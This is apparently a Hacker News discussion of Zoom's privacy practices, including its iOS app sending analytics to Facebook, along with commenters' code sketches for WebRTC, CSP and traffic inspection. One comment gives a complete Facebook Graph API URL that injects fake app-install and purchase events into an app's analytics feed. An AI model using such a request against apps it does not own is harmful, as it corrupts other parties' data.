As my own side note, I am generally on board with almost everything MS has been doing lately -- we're mostly a MS shop as they help us with pricing, given we're a nonprofit, while AWS told us 'no chance' -- but Teams has to be the single buggiest MS product I've ever used. Just now, over the past month or so, I've noticed it very slowly improving. But for the first year of our usage, we experienced constant issues. Dropped calls, silent crashes, daily sync failures. My favorite one was, every time I would shut down Teams, it would relaunch itself a few seconds later with a message saying 'sorry, Teams has crashed, we're recovering.' Apparently every time the program received a shutdown msg it just assumed 'oops, another crash.'

SnowflakeOnIce(10000) about 20 hours ago [-]

Many music teachers are doing online lessons now, mostly via Zoom.

It seems that Zoom is the only popular videoconferencing software these days that allows you to disable all the postprocessing on the audio signal (echo cancellation, noise reduction, etc) through advanced settings. This postprocessing is very useful for /conversation/ meetings among many people with bad audio setups, but for two musicians and music signals, the postprocessing is highly detrimental, causing strange audio artifacts and causing instruments to drop out sporadically.

(It seems like there would be a market for videoconferencing software optimized for musicians, where the audio signal is sent at higher quality, given higher priority, and not postprocessed in detrimental ways. And without all the privacy concerns.)
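
For comparison, the browser's WebRTC capture API exposes the same knobs as standard constraints. A minimal sketch of requesting an unprocessed, music-friendly stream (this is the web platform API, not Zoom's internals):

    // Request raw audio: disable the processing that conversation-oriented
    // apps turn on by default. These are standard MediaTrackConstraints;
    // browser support for each flag varies.
    async function getMusicFriendlyStream(): Promise<MediaStream> {
      return navigator.mediaDevices.getUserMedia({
        audio: {
          echoCancellation: false, // echo cancellers mangle sustained notes
          noiseSuppression: false, // quiet passages aren't "noise"
          autoGainControl: false,  // preserve the player's dynamics
          channelCount: 2,         // ask for stereo if the device offers it
        },
      });
    }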

imhoguy(4113) about 16 hours ago [-]

It also just works on Linux - video, screen sharing, window sharing, remote control, whiteboard. Moreover: recording, a simple way to mute anyone as host, host-less rooms. 1-100 peers? No problem. No need to create an account for guests to participate.

sytse(1843) about 11 hours ago [-]

Zoom decided to remove the Facebook SDK from their iOS client, fixing this issue: https://blog.zoom.us/wordpress/2020/03/27/zoom-use-of-facebo...

ChrisMarshallNY(4343) about 22 hours ago [-]

Zoom is the first video conferencing platform that I've used, that works reliably. They are gonna come out of this mess smelling like roses, no matter what carbuncles are exposed.

I've been doing videoconferencing for over 30 years (yes, they had it back then - we used PictureTel systems, over ISDN).

I regularly participate in Zoom meetings with 20 or more attendees. I know of ones that have over 400.

An amazing thing to me, is that technophobes can pick up on it very easily. Very little of that pre-meeting 'Mute your mike!', 'Can you hear me?', 'Whose dog is that?', tons of texts, asking for help, etc, stuff.

Skype is very bad for more than a small handful of attendees.

WebEx and GoToMeeting are OK, I guess, and I've heard good things about BlueJeans.

But Zoom is what I use, and Zoom is very popular with people that suddenly need to gather, and can't do so, physically.

StreamBright(2810) about 18 hours ago [-]

>> what is the value proposition for Zoom?

Energy consumption. A half hour of Hangouts drains 30% of the battery; 3 hours of Zoom is roughly 5-10%. UX and performance are the two major factors in why we chose Zoom.

coder1001(4341) about 23 hours ago [-]

'the best of those, Zoom, is doing very well'

Is Zoom really the best? No other comparable platform out there?

Anyone know how difficult it would be to build something like it on top of aws or a similar cloud?

sakopov(3956) about 22 hours ago [-]

A while ago I remember reading that a typical video conferencing/streaming setup on AWS has astronomical costs. I don't remember exactly which AWS services were used in the estimate, but it seemed very prohibitive for startups.

peterwwillis(2691) about 22 hours ago [-]

> Anyone know how difficult it would be to build something like it

Companies have been trying to build the perfect video chat system for about 30 years. Companies with tens of billions of dollars in cash and more in stock. Almost all of them suck in various ways.

You can stream one audio+video to one person, and you can stream it to multiple people. But then do multiple duplex audio+video streams to multiple people, on multiple platforms, with low CPU, memory, and bandwidth requirements, with user controls, recording, chat, screen sharing, drawing, and 50 other features. Get 49 of them right, and the 50th feature will suck, and your users will hate it and be ready to move to a different product. I think it's one of the most complex user applications that exists.
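
A back-of-the-envelope sketch of why scale is the hard part: in a peer-to-peer full mesh, every client uploads a separate stream to every other peer, so cost grows with call size, while a forwarding server (SFU) keeps client upload constant. Numbers below are illustrative:

    // Per-client upload streams in the two common topologies.
    const meshUploadsPerClient = (n: number) => n - 1; // one stream per peer
    const sfuUploadsPerClient = () => 1; // server fans out to the n - 1 peers

    for (const n of [2, 6, 20, 200]) {
      console.log(
        `${n} participants: mesh=${meshUploadsPerClient(n)}/client, sfu=${sfuUploadsPerClient()}/client`
      );
    }

This is also why nothing beyond small calls runs as a pure mesh, and why the operator's servers see the streams unless the product is end-to-end encrypted.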

jamra(10000) about 23 hours ago [-]

WebRTC pretty much handles peer-to-peer video chat. I think you just need a server to organize the calls, provide chat, and handle login.
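
That's roughly right: with WebRTC the media flows peer-to-peer, and the server's main job is rendezvous, i.e. relaying session descriptions and ICE candidates between peers. A minimal signaling sketch using the ws package (the message shape is invented for illustration; auth and cleanup are omitted):

    import { WebSocketServer, WebSocket } from "ws";

    // Minimal WebRTC signaling server: clients join a room, then relay
    // SDP offers/answers and ICE candidates to the other peers in it.
    const rooms = new Map<string, Set<WebSocket>>();
    const wss = new WebSocketServer({ port: 8080 });

    wss.on("connection", (ws) => {
      let room: Set<WebSocket> | undefined;
      ws.on("message", (raw) => {
        const msg = JSON.parse(raw.toString()); // { type, roomId, payload }
        if (msg.type === "join") {
          room = rooms.get(msg.roomId) ?? new Set();
          rooms.set(msg.roomId, room.add(ws));
        } else if (room) {
          for (const peer of room) if (peer !== ws) peer.send(raw.toString());
        }
      });
    });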

geoffeg(10000) about 23 hours ago [-]

I've been playing around with jitsi (https://jitsi.org/) and have been impressed. I may play around with deploying their server on aws this weekend (via this docker, most likely: https://github.com/jitsi/docker-jitsi-meet)

crazygringo(3914) about 22 hours ago [-]

I used to work in videoconferencing, and Zoom seemingly came out of nowhere and everybody loved it, because people overwhelmingly said it really is the best.

In terms of actual reliable video/audio experience, that is. When evaluating platforms, other videoconferencing solutions simply suffered quality issues more -- taking longer to start, glitches, latency, pausing, echo, and so on.

Also, the hard part isn't building 1-1 video chat. It's having it work with 20 or 200 separate participants.

I have no idea why they're better except that building reliable audio-video at scale turns out to be a really hard problem, and they seemed to focus their engineering on that specifically.

Kind of like file sync was really unreliable until Dropbox decided to focus on building a sync tool that actually 'just worked'. Same philosophy. Zoom is the Dropbox of videoconferencing.

ryeguy_24(3291) about 22 hours ago [-]

I get that privacy is important, but this company has become a household name overnight. My mom literally just installed Zoom because her friends were talking about it (eyeroll). The company has obviously helped the global economy work remotely and kept productivity moving over the past few months. First, thank you to Zoom for making a great product and continuing to work under ridiculous load. Secondly, I agree that privacy is an issue but can we tone it down a bit considering the global situation at stake.

What am I missing? I'm asking humbly. Because it seems like we are complaining about the food at a homeless shelter?

exolymph(430) about 18 hours ago [-]

At what time would it be acceptable to critique Zoom's surveillance practices, in your view? We're not allowed to complain when a useful tool also spies on us?

himaraya(4159) about 22 hours ago [-]

1. Paid service 2. Privacy is important.

catalogia(4333) about 22 hours ago [-]

> I agree that privacy is an issue but can we tone it down a bit considering the global situation at stake.

It seems to me that this is the best possible time to make some noise about Zoom's privacy problems. What better time for that could there be than during a period of mass adoption? What better opportunity to shame a company into compliance than during a global pandemic when the responsibilities of companies to the community is being emphasized?

You might have a point if castigating Zoom for spying on users somehow facilitated the spread of corona, but it doesn't.

tinyhouse(10000) about 17 hours ago [-]

Do Zoom have their own infrastructure or do they run on aws/azure/gcloud?

I think it's amazing how zoom became so popular recently. It's even been approved to be used for Passover Seder dinner by some Rabbis :)

It also very popular in academia and reminds me of Dropbox. When I was a student everyone around me used Dropbox. They developed a great product which competes with Google and other giants. But those were all unpaid users and eventually Dropbox moved their focus to Enterprise. Zoom will soon be in a similar situation.

Rafuino(3790) about 17 hours ago [-]

I had the same question... It looks like they use AWS, though this paper I found is dated May 2013...

https://d24cgw3uvb9a9h.cloudfront.net/static/40580/doc/Zoom-...

quocble(10000) about 15 hours ago [-]

Wow, hackernews is a cesspool of self-serving 'intellectuals'. We're in the middle of a pandemic, which has already killed 27 thousand people. And the #1 post is a privacy act? Can't you guys admit that you didn't come up with a video calling company worth 37 billion dollars. Maybe it's worth talking about the positive impact of Zoom during this crisis.

FridgeSeal(10000) about 15 hours ago [-]

"This company is doing incredibly shady things and exploiting its sudden boost in popularity, so you guys shouldn't criticise it, because it's made soooo much money and you didn't and it's therefore above criticism "

That's how your comment reads. The fact that it's worth so much is almost completely irrelevant, and if anything, should mean they have more responsibility to do the right thing.

zekrioca(4322) about 21 hours ago [-]

Does anyone have any knowledge of how Zoom is architected? I know they own some datacenters, but so does Microsoft, which has a worse service than Zoom.

bennofs(10000) about 18 hours ago [-]

An overview is given in their blog post: https://blog.zoom.us/wordpress/2019/06/26/zoom-can-provide-i...

However, I would also like to know if there's more to it. Do they do any server-side transcoding? Do they get an advantage by having multiple backend servers connected through good links, having clients connect to the nearest one, and routing efficiently through their network? It appears that they use(d) H264 as their codec; are there some technical tricks they use to cope with variable bandwidth (do they use scalable video coding or simulcast)?

blntechie(4254) about 21 hours ago [-]

Zoom has had several privacy controversies now and is still going strong. Great staying power, like Facebook.

The product must be really good. I have never used it on more than a couple of occasions, and found it like any other web conferencing tool, in my opinion.

alfalfasprout(10000) about 21 hours ago [-]

Truth is, it has the best video quality I've seen out of any of the video conferencing tools out there, by a mile. Only FaceTime comes close, and it's limited to Apple hardware and has more limited screen collaboration tools.

As a result, they're going to have staying power.

Medicalidiot(10000) about 23 hours ago [-]

I am always very hesitant to say anything personal over any video chat medium unless I know it's end to end encrypted. I know that they're not actively watching my video meetings, but it's still causing a chilling effect in how I conduct myself with their service.

angry_octet(3751) about 22 hours ago [-]

Zoom works in China, ergo it is being recorded and analyzed. Automatic voice transcription is a thing.

thekyle(3181) about 21 hours ago [-]

What are some end-to-end encrypted video chat apps? I know Signal offers it, but only for one-on-one calls.

gnusty_gnurc(10000) about 23 hours ago [-]

I've found Jitsi to be more than adequate with no need to download an app onto my computer. Just share the link with my friends!

sakopov(3956) about 22 hours ago [-]

I tried it yesterday with some friends and in my opinion it's not ready for any serious use. The chat feature looks clunky and sometimes messages don't send on the first try; the drawing board especially. Sometimes emojis you send in chat get plastered in the top right corner at about 10 times the size and stay there. I've also had the video feed and all controls disappear in the middle of a live session, and the only fix was to close the app and sign in via the invite link. Still happy that something like this exists. Just needs a little bit of polish.

JumpCrisscross(38) about 19 hours ago [-]

> I've found Jitsi to be more than adequate

Just looked it up. Seems to be Chrome only. As a Safari and Firefox user, that ends my decision-making tree with two clicks.

chias(10000) about 18 hours ago [-]

I thought this was going to be about their hilarious CSP, which whitelists the following domains:

    'unsafe-eval'
    'unsafe-inline'
    blob:
    https://*.50million.club
    https://*.adroll.com
    https://*.cloudfront.net
    https://*.google.com
    https://*.hotjar.com
    https://*.zoom.us
    https://*.zoomus.cn
    https://*.zopim.com
    https://ad.lkqd.net
    https://ajax.aspnetcdn.com
    https://apiurl.org
    https://appsforoffice.microsoft.com
    https://assets.zendesk.com
    https://bat.bing.com
    https://cdn.5bong.com
    https://cdn.jsdelivr.net
    https://cdncache-a.akamaihd.net
    https://code.jquery.com
    https://connect.facebook.net
    https://consent.trustarc.com
    https://extnetcool.com
    https://fp166.digitaloptout.com
    https://googleads.g.doubleclick.net
    https://intljs.rmtag.com
    https://pi.pardot.com
    https://px.ads.linkedin.com
    https://ruanshi2.8686c.com
    https://rum-static.pingdom.net
    https://s.dcbap.com
    https://s.yimg.com
    https://s.ytimg.com
    https://s3.amazonaws.com
    https://scout-cdn.salesloft.com
    https://sealserver.trustwave.com
    https://secure-cdn.mplxtms.com
    https://secure.myshopcouponmac.com
    https://snap.licdn.com
    https://sp.analytics.yahoo.com
    https://srvvtrk.com
    https://static.zdassets.com
    https://static2.sharepointonline.com
    https://tag.demandbase.com
    https://tpc.googlesyndication.com
    https://tracking.g2crowd.com
    https://translate.googleapis.com
    https://trk.techtarget.com
    https://unpkg.com
    https://www.comeet.co
    https://www.dropbox.com
    https://www.google-analytics.com
    https://www.googleadservices.com
    https://www.googletagmanager.com
    https://www.gstatic.com
    https://www.youtube.com
    https://d.adroll.mgr.consensu.org
    https://serve2.cheqzone.com
    https://static.ada.support
    'self'
via: https://twitter.com/jasvir/status/1242518507683639296
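
For contrast, a deliberately strict policy is short. A sketch of serving one (the directive names are standard CSP; the allowed origin is illustrative, not Zoom's):

    import { createServer } from "http";

    // A tight CSP: no 'unsafe-inline', no 'unsafe-eval', and only origins
    // the page actually needs. Every extra origin in the whitelist above
    // is a party allowed to run script on the page.
    const csp = [
      "default-src 'self'",
      "script-src 'self' https://cdn.example.com",
      "connect-src 'self'",
      "frame-ancestors 'none'",
    ].join("; ");

    createServer((_req, res) => {
      res.setHeader("Content-Security-Policy", csp);
      res.end("<h1>hello</h1>");
    }).listen(8443);
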
quickthrower2(1376) about 17 hours ago [-]

Yes, unpkg and S3 - anyone can get content up on them.

wyoh(4293) about 21 hours ago [-]

Can someone explain the advantages of Zoom over a FOSS solution like Jitsi Meet? https://meet.jit.si/

nhf(3971) about 19 hours ago [-]

Institutional buy-in and support. When your 40,000-student university's administration declares 'we are using Zoom for online classes and it's been integrated into our class management system by IT', it just gets used.

And that university chooses to use Zoom over another solution for many reasons - after-sales support, SLAs for performance and availability, pre-written API integrations for their CMS and student ID system, guarantees from their sales team about regulatory compliance, and the like.

gbrown(10000) about 15 hours ago [-]

One thing I've noticed about it which rubs me the wrong way is that, on Linux, when I exit the application it keeps running in the background. There's no reason given for why this should be necessary, and I don't see any option to disable it. I shouldn't have to manually kill the process to exit a program.

ntnsndr(3942) about 14 hours ago [-]

I agree this is annoying, but you can always Exit the program from the icon in the menubar (works for me on both GNOME and xfce).

mrpippy(3793) about 17 hours ago [-]

I just downloaded Zoom for Mac, saw that it was a .pkg file. Great, I can see what files it installs before I install it.

I open the .pkg, click Continue so it can run its script, then a second later Installer quits and the app launches. What?!

Turns out, Zoom installs the entire app in the 'preinstall' script of the installer package! Inside there's a copy of '7z', and the app is extracted with that. The preinstall script is littered with typos and poor grammar.

I'm not one of those people who thinks that Apple is going to force all Mac software to come through the App Store, but when I see stuff this stupid...I start to wonder.

kccqzy(3192) about 13 hours ago [-]

This is exactly what creeped me out when I first installed Zoom years ago.

Very few people cared when I commented this https://news.ycombinator.com/item?id=20398084

Suffice it to say, I no longer trust Zoom to be running in my regular user account. I have a separate user on my Mac to isolate it. If you have the means, you might even consider a spare computer or a VM to run Zoom.

Wowfunhappy(3954) about 16 hours ago [-]

While I also dislike this type of thing, remember that Zoom's business is built on getting people into calls as quickly as possible. Seconds matter.

So I can totally understand why they would want to use 7zip to shave kilobytes off the download size.

pfranz(10000) about 15 hours ago [-]

I feel like Zoom has a history of doing shady things under the veil of 'ease of use' (referring to the uninstall complaints a few months ago).

I do think that on macOS the average user doesn't understand DMG files, and runs apps from inside the DMG instead of copying them to /Applications and deleting the disk image. My guess is that most people install Zoom after a meeting has started and this was the quickest, fewest-dialogs method of getting it up and running.

ThePowerOfFuet(10000) about 15 hours ago [-]

Next time, open the .pkg with Pacifist.

skrebbel(3354) about 22 hours ago [-]

Is Zoom-dissing just in fashion these days? In the last few days I've seen these on HN:

- Having the Facebook SDK installed in their iOS app, which sends user data to Facebook even if the user has no Facebook account

- Having a setting (off by default) that lets other callers see whether you have the Zoom app in focus

- Having a general 'accessibility over security' engineering attitude, which led them to, e.g., shipping their desktop apps with a built-in HTTP server (and with it a much bigger security surface area), just to skip one extra step in the join-meeting-via-a-Zoom-link flow. They removed it after a backlash, but the engineering attitude probably didn't change.

Now, I agree that all of these are bad. It's OK for outrage to happen over these things; every single one of them is shit, and major companies like Zoom need to get their act together.

But I also think that many apps out there do stuff like this. The majority of popular apps, I'd wager. Why is Zoom being singled out? First Vice, now a Harvard blog, a bunch of unsubstantiated tweet storms... Is it just en vogue to diss Zoom somehow?

catalogia(4333) about 22 hours ago [-]

> Why is Zoom being singled out?

There is no conspiracy here, calm down. Zoom is popular, therefore people talk about it.

kwesthaus(10000) about 22 hours ago [-]

You are right that many pieces of software infringe on privacy. However, Zoom has only recently become one of the most widespread of these, and because of that has only recently begun to affect a significant portion of the population, which is why it is newsworthy.

I think this also has to do with the fact that Zoom is being used for work and school, and therefore people have less choice over their use of it. It's not a social network that many people have chosen to start using; it's a piece of software that millions of students and other people are being required to use without consideration of privacy.

say_it_as_it_is(3750) about 23 hours ago [-]

One major problem for Zoom is that it cannot merely focus on its core video conferencing competency while achieving the growth objectives of a publicly traded company. A high-quality video conferencing platform is hard to replicate until it isn't. The amount of talent and energy being spent right now on video conferencing, as a result of remote work, is going to amount to commoditization of high-quality video conferencing. Zoom has maybe another 12 months of juice left. As a result, it's advancing into new categories and will be competing with its own customers very soon.

I'd be very cautious about sharing information with Zoom. You may be showing it where to fish.

dimal(10000) about 19 hours ago [-]

In 12 months, it won't matter if there are 10 other products offering a comparable service. Companies won't want to pay the cost of switching for something that's 'just as good'. It has to be 10x better to justify the switch. Consumers won't switch because everyone else will have Zoom. A videoconferencing app is only useful if both parties have it installed.

osrec(3297) about 22 hours ago [-]

So, you think it'll turn into a generalized software consulting company??

thedance(10000) about 21 hours ago [-]

How hard can it possibly be to replicate? Zoom walked into a market packed with established players and now they own the whole thing. That suggests the barriers to entry aren't so great.

AndyPa32(10000) about 21 hours ago [-]

The paid version has a feature where the organization's admins can listen in on and watch conversations without anybody noticing or giving consent. I am quite sure that doing so would be illegal where I live (Germany).

ShakataGaNai(4340) about 20 hours ago [-]

Unless you gave 'consent' in your employment contract, or agreed to the company's employee handbook, AUP, or similar documentation. This sort of 'agreement to monitoring' is common in a lot of corporations today.

Please don't use your company-issued hardware/software/network for anything that's not work-related ... or anything you wouldn't feel comfortable sharing with most of your colleagues. There is already a plethora of monitoring going on out there.

cheeze(10000) about 21 hours ago [-]

That's creeeeeeepy.

Androider(4149) about 18 hours ago [-]

I don't think that's true, source? At least I've never seen that as an Enterprise admin.

Based on some quick googling, are you perhaps mistaking Zoom, the video conferencing software, for the confusingly similarly named ZOOM International, which does call-center/agent software but is a completely unrelated and much older company?

xenonite(4263) about 18 hours ago [-]

If you are looking for a source of these claims, let me give you one: https://www.eff.org/deeplinks/2020/03/what-you-should-know-a...

> Administrators also have the ability to join any call at any time on their organization's instance of Zoom, without in-the-moment consent or warning for the attendees of the call.

graphememes(4303) about 18 hours ago [-]

Citation required, cannot find this in the feature list, support documentation, or on the pricing page.





Historical Discussions: Zoom iOS app sends data to Facebook even if you don't have a Facebook account (March 26, 2020: 1340 points)

(1408) Zoom iOS app sends data to Facebook even if you don't have a Facebook account

1408 points 2 days ago by softwaredoug in 3487th position

www.vice.com | Estimated reading time – 4 minutes | comments | anchor

As people work and socialize from home, video conferencing software Zoom has exploded in popularity. What the company and its privacy policy don't make clear is that the iOS version of the Zoom app is sending some analytics data to Facebook, even if Zoom users don't have a Facebook account, according to a Motherboard analysis of the app.

This sort of data transfer is not uncommon, especially for Facebook; plenty of apps use Facebook's software development kits (SDKs) as a means to implement features into their apps more easily, which also has the effect of sending information to Facebook. But Zoom users may not be aware it is happening, nor understand that when they use one product, they may be providing data to another service altogether.

'That's shocking. There is nothing in the privacy policy that addresses that,' Pat Walshe, an activist from Privacy Matters who has analyzed Zoom's privacy policy, said in a Twitter direct message.

Upon downloading and opening the app, Zoom connects to Facebook's Graph API, according to Motherboard's analysis of the app's network activity. The Graph API is the main way developers get data in or out of Facebook.

Do you know anything else about data selling or trading? We'd love to hear from you. Using a non-work phone or computer, you can contact Joseph Cox securely on Signal on +44 20 8133 5190, Wickr on josephcox, OTR chat on [email protected], or email [email protected]

The Zoom app notifies Facebook when the user opens the app, and sends details on the user's device such as the model, the time zone and city they are connecting from, which phone carrier they are using, and a unique advertiser identifier created by the user's device, which companies can use to target a user with advertisements.

The data being sent is similar to that which activist group the Electronic Frontier Foundation (EFF) found the app for surveillance camera vendor Ring sent to Facebook.

Will Strafach, an iOS researcher and founder of the privacy-focused iOS app Guardian, confirmed Motherboard's findings that the Zoom app sent data to Facebook.

'I think users can ultimately decide how they feel about Zoom and other apps sending beacons to Facebook, even if there is no direct evidence of sensitive data being shared in current versions,' he told Motherboard in a Twitter direct message.

'That's shocking. There is nothing in the privacy policy that addresses that.'

Zoom is not forthcoming about the data collection or its transfer to Facebook. Zoom's policy says the company may collect users' 'Facebook profile information (when you use Facebook to log-in to our Products or to create an account for our Products),' but doesn't explicitly mention anything about sending data to Facebook on Zoom users who don't have a Facebook account at all.

Facebook told Motherboard it requires developers to be transparent with users about the data their apps send to Facebook. Facebook's terms say 'If you use our pixels or SDKs, you further represent and warrant that you have provided robust and sufficiently prominent notice to users regarding the Customer Data collection, sharing and usage,' and specifically for apps, 'that third parties, including Facebook, may collect or receive information from your app and other apps and use that information to provide measurement services and targeted ads.'

Zoom's privacy policy says 'our third-party service providers, and advertising partners (e.g., Google Ads and Google Analytics) automatically collect some information about you when you use our Products,' but does not link this sort of activity to Facebook specifically.

Zoom did not respond to a request for comment.

Zoom has a number of other potential privacy issues too. As the EFF laid out, hosts of Zoom calls can see if participants have the Zoom window open or not, meaning they can monitor if people are likely paying attention. Administrators can also see the IP address, location data, and device information on each participant, the EFF added.

Subscribe to our cybersecurity podcast, CYBER.




All Comments: [-] | anchor

phwd(1212) 1 day ago [-]

At the risk of pointing to the documentation,

graph-facebook-com/app/activities is an endpoint used by 3rd party developers working with Facebook SDKs to send app analytic data for insights.

https://developers.facebook.com/docs/marketing-api/app-event... http://www.facebook.com/analytics https://business.facebook.com/events_manager/app/events

This is what a URL can look like.

graph-facebook-com/1106907002683888/activities?method=POST&event=MOBILE_APP_INSTALL&anon_id=1&advertiser_tracking_enabled=1&application_tracking_enabled=1&custom_events=[{%22_eventName%22:%22fb_mobile_purchase%22,}]

If you click the above you'll litter my analytics feed for my app 1106907002683888 with junk data.

Just in case someone was looking for the specific call being talked about, because I couldn't find it linked in Vice's article.
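
For the curious, a minimal sketch that reconstructs such an app-events URL from the format phwd shows above, without sending anything; the app ID is a placeholder, and per the caution in the reply below you should only ever point this at an app you own:

    import json
    import urllib.parse

    APP_ID = "0000000000000000"  # placeholder -- use your own app's ID only

    params = {
        "method": "POST",
        "event": "MOBILE_APP_INSTALL",
        "anon_id": "1",
        "advertiser_tracking_enabled": "1",
        "application_tracking_enabled": "1",
        "custom_events": json.dumps([{"_eventName": "fb_mobile_purchase"}]),
    }

    # Build the URL only; deliberately not sending the request.
    url = "https://graph.facebook.com/%s/activities?%s" % (
        APP_ID, urllib.parse.urlencode(params))
    print(url)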

floatingatoll(4062) 1 day ago [-]

It's generally not a good idea to clearly "wink wink" indicate how to abuse an endpoint, since that abuse can be easily interpreted under various criminal laws as malicious and worthy of prosecution. You could protect yourself against such accusations with more neutral language, starting with rewording the "litter" sentence.

justlexi93(10000) 1 day ago [-]

The very idea of sending someone's data to anywhere without explicit permission SHOULD BE AGAINST THE LAW.

xenonite(4263) 1 day ago [-]

It is, in Europe with the GDPR.

ChrisMarshallNY(4343) 1 day ago [-]

Are they using a Facebook dependency? FB has a couple of libraries popular for use as UI libraries.

I didn't think they phoned home, but I could be wrong.

RandallBrown(3870) 1 day ago [-]

It's probably used for install tracking.

Apple doesn't provide a way to know how a user found your app, but Facebook does. This is why the app I work on uses the Facebook SDK.

Basically, we want to know how effective our Facebook ads are at getting actual installs.

floatboth(4340) 1 day ago [-]

They're using the Facebook SDK. The one for, well, interacting with Facebook's actual social network.

danabramov(846) 1 day ago [-]

If you mean React, it doesn't have any telemetry, and never had. (You can audit the code on GitHub, it's open source.)

The SDK in question is Facebook SDK which is completely separate from user interface libraries.

itronitron(4187) 1 day ago [-]

Are you asking about React and GraphQL? I'm not sure whether they phone home but their development was certainly subsidized by abusing people's privacy.

ddrt(10000) about 22 hours ago [-]

Is this article overreacting to something that sounds like a Facebook tracking pixel?

karljtaylor(10000) about 20 hours ago [-]

yes, yes it is.

liquidify(10000) 1 day ago [-]

Didn't zoom get their start claiming to be a privacy conscious company?

dylan604(3585) 1 day ago [-]

If they did, what's that matter? Google started with a tag line of 'Don't be evil'. 9 out of 10 doctors used to say smoking was good for your health. Choosy moms choose JIF (not GIF).

rococode(3217) 1 day ago [-]

If you have a Facebook account and are curious what other apps and websites are sending data about you to Facebook, check out this link:

https://www.facebook.com/off_facebook_activity/activity_list

(click the area with the various app & website icons to expand into a more detailed view)

I was pretty surprised the first time I came across that list, there are a lot of apps on there that I never did a Facebook login with. For example right now I see that a map app I downloaded when I was travelling last year but only opened once or twice has sent 395 'interactions', the latest of which was 3 days ago. Actually, I should probably delete that now haha. Also, I'm using Firefox with the Facebook container, Privacy Badger, and uBlock Origin, and there are still many websites listed.

koyote(10000) 1 day ago [-]

So I do not have facebook installed on my phone but I do have instagram and whatsapp.

A large number of phone apps seem to appear in that list. I guess WhatsApp/Instagram creates a fingerprint of my device and then uses that for tracking?

jmiserez(4330) 1 day ago [-]

You can disable it under: More Options -> Manage Future Activity: https://www.facebook.com/off_facebook_activity/future_activi...

st3fan(2391) 2 days ago [-]

EVERY. SINGLE. APP. THAT. INCLUDES. THE. FACEBOOK. SDK.

Even if you don't log in. The Facebook SDK sends data back.

Hook your device up to an intercepting proxy and start up a few apps. 99% of them do this.

I really wish Apple would put an end to this.
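
For anyone who wants to run st3fan's experiment, here is a minimal sketch of a mitmproxy addon that logs traffic to Facebook endpoints; it assumes your device is routed through the proxy and trusts its certificate (apps that pin certificates will defeat this):

    # fb_spotter.py -- run with: mitmproxy -s fb_spotter.py
    from mitmproxy import http

    FB_HOSTS = ("graph.facebook.com", "connect.facebook.net")

    def request(flow: http.HTTPFlow) -> None:
        # Log any request an app makes to a Facebook endpoint.
        if flow.request.pretty_host.endswith(FB_HOSTS):
            print("[FB beacon] %s %s" % (flow.request.method, flow.request.pretty_url))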

leipert(4319) 1 day ago [-]

This was presented at the 36C3 last year: https://media.ccc.de/v/36c3-10693-no_body_s_business_but_min...

I assume a lot of people just "slap" the SDK in there and call it a day and it starts sending data.

megablast(3889) 1 day ago [-]

Can't apps start up the facebook SDK after someone has clicked the facebook login button? If someone has already logged in with facebook, set a flag in NSUserDefaults, and start the sdk then.

kube-system(10000) 1 day ago [-]

Tons of websites do this as well

wideasleep1(10000) 1 day ago [-]

Examples on Android for 'an intercepting proxy' are No Root Firewall, and even better, the paid/donate version of Netguard, which allows you to permanently kill these errant calls. Additionally, you can disable Google Services Framework with it too, if you'd like to try running your Android without Google tethered and watching, while you enjoy sweet, well-designed FOSS apps and services.

pergadad(10000) 1 day ago [-]

Is this automatically part of any app using react/react native?

ChrisMarshallNY(4343) 1 day ago [-]

If they did, it would raise a ruckus.

There's a lot of developers that rely on these dependencies, and just blocking them would cause a major backlash.

ozmbie(10000) 1 day ago [-]

I would love if Apple started treating app analytics like they do my GPS location or my camera permissions. Basically, if apps want to send analytics, they must go through an iOS API.

Then as a user, I can inspect what apps are sending and how frequently. I should be able to block requests or set myself as anonymous. Or allow apps for certain amounts of time etc.

yellow_postit(4080) 1 day ago [-]

This is equivalent to including Google Analytics or any 3P analytics platform.

qserasera(10000) 1 day ago [-]

Thank you st3fan. I will reference your comment in the future.

AnthonyMouse(4234) 1 day ago [-]

> I really wish Apple would put an end to this.

This is what really gives the lie to the whole walled garden thing. Its selling point is supposed to be Apple preventing things like this, but here we are in reality and they don't. Meanwhile they do e.g. prevent Signal from replacing Apple's default app for SMS, which has no purpose other than to create barriers for cross-platform competitors to the default apps.

golergka(2697) 1 day ago [-]

As an app developer, I think that I've done 'Facebook SDK integration' task over 10 times at the very least. I don't think I'm the only one. It's unrealistic to expect a mobile app not to offer a user the option to login through Facebook.

And yet, we don't need to integrate Facebook's binary blobs to use this SDK's main features. How about we implement the open version of Facebook SDK that uses their APIs but doesn't do anything that we don't want it to?

arendtio(10000) about 19 hours ago [-]

Apple is busy deleting localStorage data from PWA users...

For those who did not read about it: https://andregarzia.com/2020/03/private-client-side-only-pwa...

mpclark(4322) 1 day ago [-]

I'm surprised Zoom is happy for Facebook to know exactly who its customers are. This is information that could be used against the company at some point, for example if FB made a video conferencing play.

ElectrodesD(10000) about 24 hours ago [-]

Apple isn't interested in that, and neither are most of the corporations out there. Data is one of the most valuable assets and this is easy cash flow.

ladfjkl(10000) 1 day ago [-]

Has anyone tried the Lockdown app? https://9to5mac.com/2019/07/24/lockdown-ios-firewall-open-so...

It looks promising, and has been posted to HN a few times, but nobody has commented on it. https://news.ycombinator.com/item?id=20519456

tdstein(10000) 1 day ago [-]

This! It isn't just Zoom. It's a known 'feature' of the Facebook SDK.

product50(10000) 1 day ago [-]

The world is facing such a massive crisis, people are getting laid off, and here on HN/Vice, they are discussing why a VC app is sending an anonymized link to Facebook.

ThePowerOfFuet(10000) 1 day ago [-]

There are so many other alternatives that don't sell out user privacy, so calling them out for slimy shit like this is never inappropriate.

lacker(1782) 1 day ago [-]

Does it really make sense to call it a 'VC app' when Zoom is a public company worth more than Ford or GM?

ncr100(10000) 1 day ago [-]

Correct. And, People who like Power are seeing an Opportunity to get more power.

ANY TIME you can predict what people will do, e.g. be shut-ins, that is an opportunity to be exploited for better or worse.

IF YOU CAN MAKE PEOPLE DO things, en masse, then you're IN POWER. Congratulations.

Zoom giving data to Facebook during a crisis means Facebook can track your critical social network members.

I do expect the crisis will pass, and I don't want to have LOST any more of my privacy as a by-product.

qwtel(4334) 1 day ago [-]

More breaking news: Almost every website sends data to google, even if you don't have a google account.

Singling out Facebook as the privacy nemesis while giving a free pass to 'cute' conglomerates like Google reeks of class hatred and flavor-of-the-month-style pseudo journalism.

Opening vice.com link will send data to Google.

randomsearch(4327) 1 day ago [-]

Whataboutism, and this is about Zoom (on trend) and related to its other fails.

kpierce(10000) 1 day ago [-]

Their desktop version is not much better.

https://securityboulevard.com/2020/03/using-zoom-here-are-th...

rochak(4063) about 20 hours ago [-]

It has been known for a while now not to touch their desktop app with even a ten-foot pole. The best bet is using the web app.

